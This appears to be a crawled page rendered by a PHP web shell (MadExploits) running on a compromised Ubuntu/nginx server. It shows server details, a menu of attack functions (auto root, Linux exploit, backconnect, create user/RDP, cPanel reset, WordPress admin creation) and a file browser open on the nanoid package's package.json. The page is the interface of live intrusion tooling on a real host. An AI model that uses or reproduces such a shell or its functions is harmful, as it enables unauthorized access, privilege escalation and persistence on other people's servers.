Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
nanoid /
[ HOME SHELL ]
Name
Size
Permission
Action
async
[ DIR ]
dr-xr-xr-x
bin
[ DIR ]
dr-xr-xr-x
non-secure
[ DIR ]
dr-xr-xr-x
url-alphabet
[ DIR ]
dr-xr-xr-x
LICENSE
1.07
KB
-rw-rw-rw-
README.md
1.52
KB
-rw-rw-rw-
index.browser.cjs
1.05
KB
-rw-rw-rw-
index.browser.js
1.04
KB
-rw-rw-rw-
index.cjs
1.31
KB
-rw-rw-rw-
index.d.cts
2.2
KB
-rw-rw-rw-
index.d.ts
2.2
KB
-rw-rw-rw-
index.js
1.29
KB
-rw-rw-rw-
nanoid.js
169
B
-rw-rw-rw-
package.json
2.18
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "nanoid", "version": "3.3.7", "description": "A tiny (116 bytes), secure URL-friendly unique string ID generator", "keywords": [ "uuid", "random", "id", "url" ], "engines": { "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1" }, "funding": [ { "type": "github", "url": "https://github.com/sponsors/ai" } ], "author": "Andrey Sitnik <andrey@sitnik.ru>", "license": "MIT", "repository": "ai/nanoid", "browser": { "./index.js": "./index.browser.js", "./async/index.js": "./async/index.browser.js", "./async/index.cjs": "./async/index.browser.cjs", "./index.cjs": "./index.browser.cjs" }, "react-native": "index.js", "bin": "./bin/nanoid.cjs", "sideEffects": false, "types": "./index.d.ts", "type": "module", "main": "index.cjs", "module": "index.js", "exports": { ".": { "browser": "./index.browser.js", "require": { "types": "./index.d.cts", "default": "./index.cjs" }, "import": { "types": "./index.d.ts", "default": "./index.js" }, "default": "./index.js" }, "./package.json": "./package.json", "./async/package.json": "./async/package.json", "./async": { "browser": "./async/index.browser.js", "require": { "types": "./index.d.cts", "default": "./async/index.cjs" }, "import": { "types": "./index.d.ts", "default": "./async/index.js" }, "default": "./async/index.js" }, "./non-secure/package.json": "./non-secure/package.json", "./non-secure": { "require": { "types": "./index.d.cts", "default": "./non-secure/index.cjs" }, "import": { "types": "./index.d.ts", "default": "./non-secure/index.js" }, "default": "./non-secure/index.js" }, "./url-alphabet/package.json": "./url-alphabet/package.json", "./url-alphabet": { "require": { "types": "./index.d.cts", "default": "./url-alphabet/index.cjs" }, "import": { "types": "./index.d.ts", "default": "./url-alphabet/index.js" }, "default": "./url-alphabet/index.js" } } }
Close